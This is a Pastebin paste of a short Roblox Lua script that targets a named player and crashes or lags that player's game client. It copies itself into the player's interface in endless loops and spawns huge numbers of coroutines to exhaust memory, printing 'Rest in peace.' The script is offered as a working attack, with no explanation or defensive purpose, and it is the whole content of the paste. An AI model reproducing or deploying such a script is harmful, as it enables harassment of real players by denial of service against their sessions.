Advertisement
Guest User

Untitled

a guest
May 26th, 2018
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.46 KB | None | 0 0
  1. local plr = game.Players.Ahmed20031
  2. local rs = game:GetService("RunService")
  3.  
  4. function lag()
  5. while true do
  6. script:clone().Parent = plr.PlayerGui
  7. print("Rest in peace.")
  8. end
  9. end
  10.  
  11. function memoryLeak()
  12. for i = 1, 50000 do
  13. coroutine.resume(coroutine.create(function()
  14. for i = 1, 50000 do
  15. spawn(lag)
  16. end
  17. end))
  18. end
  19. end
  20.  
  21. while true do
  22. spawn(memoryLeak)
  23. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement